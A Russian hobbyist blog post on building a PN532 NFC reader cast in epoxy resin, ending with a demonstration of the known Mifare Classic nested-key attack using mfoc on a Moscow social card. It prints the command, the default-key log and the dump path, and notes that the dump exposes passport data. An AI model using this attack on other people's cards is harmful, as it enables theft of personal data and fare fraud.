Самодельный NFC ридер для проверки безопасности бесконтактных карт

Я расскажу как изготовить устройство для исследования бесконтактных карт. Вместо корпуса платы будут полностью залиты прозрачной эпоксидной смолой.
Внутри подробное описание процесса изготовления и пример использования ридера для осуществления атаки на социальную карту москвича.



Основная плата ридера это PN532 Breakout Board. Она может работать по SPI, I2C и UART. Плата максимально полно поддерживается библиотекой libnfc. Список поддерживаемых ридеров.

Основное отличие этого ридера от обычных (PC/SC совместимых) в том, что с ним работает специфический извращенский софт, позволяющий выполнять недокументированные действия, которые требуются для исследовательских целей.

Для подключения ридера к компьютеру, в большинстве случаев, требуется еще одно устройство. Я буду использовать протокол UART и адаптер CP2102.

В какой-то момент мне надоели торчащие пины на плате, царапающие ткань рюкзака и болтающийся TTL адаптер, и я решил слепить все это в одно устройство с длинным кабелем.

То, что получилось в итоге:
К сожалению муська не дает вставлять видео в формате webm, хотя это открытый прогрессивный формат легковесного видео. Это видео весит 184КБ i.imgur.com/X7WyPCG.webm На видео показано считывание платежной карты MasterCard с функцией PayPass

Используемые компоненты

• Ридер на чипе PN532 с интерфейсом UART
• USB-TTL адаптер на чипе CP2102
• Паста для лепки Jovi, застывающая на воздухе
• Эпоксидная смола Gedeo Pebeo Resin Crystal

Сперва лепим богомола из пасты для моделирования. Паста довольно быстро высыхает на воздухе, поэтому нужно торопиться, иначе она начнет крошиться. На полное застывание требуются сутки. После высыхания изделие легко обрабатывается стеком или зубочисткой. Чем-то напоминает мягкий гипс или мел.



Покраска выполнялась акриловыми красками. Позже выяснилось, что это не самый лучший вариант для заливки эпоксидной смолой, потому что смола слегка растворила акрил.




Выпаиваем все торчащие пины из обоих устройств. В качестве TTL адаптера я использовал Silabs CP2102.



И припаиваем TTL адаптер к плате ридера. Прихватываем адаптер каплей термоклея, чтобы хрупкая пайка не оторвалась в процессе дальнейшей обработки.
Вместо USB штекера на TTL адаптере припаиваем кабель напрямую.
Устанавливаем перемычку на NFC ридере в положение UART.




Самым сложным оказалось изготовление формы для заливки.
Форму я изготовил из картонки и промазал воском. Размер формы несколько больше с учетом того, что лишняя смола уберется шлифовкой.



Отверстие под кабель я замазал воском от свечи.

Заливаем!







Во время заливки на поверхности могут появляться пузыри, их можно удалить прыская на поверхность этиловым спиртом (или изопропиловым?) из пульверизатора.
Чтобы на поверхность не оседала пыль, накрываем миской.




Заявленное время высыхания эпоксидной смолы 24 часа, но, так как в моем случае очень толстый слой, я решил подстраховаться и подождать двое суток.
Вытаскиваем наш слиток.






Видно как потек акрил вокруг богомола, нужно было покрыть его лаком.



Я боялся, что при застывании, смола может порвать контакты на платах, но все заработало.




Шлифуем брусок на ленточной шлифмашине, закрепленной верх ногами на столе








Убираем острые края напильником




Готово.

Зачем это нужно?

Этим ридером можно взаимодействовать с любыми картами стандарта ISO 14443. Сюда относятся проездные для общественного транспорта, платежные карты PayPass/Paywave, любые штуки с приставкой NFC и т. д. В том числе читать и модифицировать данные при достаточной компетенции.
Ридер полностью поддерживается библиотекой libnfc, что позволяет проводить аудит безопасности многих популярных типов карт.

Я не стану описывать способы накручивания денег на абонементах или любые другие незаконные действия. Но для наглядности продемонстрирую давно известную атаку на карты Mifare Classic на примере социальной карты москвича.
Карта совмещает в себе платежную карту visa, выпущенную Банком Москвы, и бесконтактную карту, являющуюся в том числе проездным на общественном транспорте.

Утилита mfoc реализует давно известную уязвимость mifare nested, позволяющую узнать ключи от всех секторов карты, при условии что известен хотя бы один ключ.

Кладем карту на ридер и запускам mfoc.

mfoc сперва попытается авторизоваться в каждом сектор используя стандартные ключи mifare. Как видно из лога, для некоторы секторов был найден ключ А. Теперь по прошествии 10-20 минут, все недостающие ключи будут найдены и дамп карты будет полностью записан в файл /tmp/msk_social.mfd

tangorobot$ mfoc/src/mfoc  -O /tmp/msk_social.mfd
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  02  
* UID size: single
* bit frame anticollision supported
       UID (NFCID1): 0d  b0  3d  7a  
      SAK (SEL_RES): 18  
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 4K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 4K, Security level 1
* SmartMX with MIFARE 4K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: ffffffffffff] -> [........................................]
[Key: a0a1a2a3a4a5] -> [/............///........................]
[Key: d3f7d3f7d3f7] -> [/............///........................]
[Key: 000000000000] -> [/............///........................]
[Key: b0b1b2b3b4b5] -> [/............///........................]
[Key: 4d3a99c351dd] -> [/............///........................]
[Key: 1a982c7e459a] -> [/............///........................]
[Key: aabbccddeeff] -> [/............///........................]
[Key: 714c5c886e97] -> [/............///........................]
[Key: 587ee5f9350f] -> [/......	......///........................]
[Key: a0478cc39091] -> [/............///........................]
[Key: 533cb6c723f6] -> [/............///........................]
[Key: 8fd0a4f256e9] -> [/............///........................]

В дампе, например, помимо абонимента для общественного транспорта, можно найти паспортные данные владельца карты, номер паспорта и кем выдан в кодировке CP1251.



Такие дела.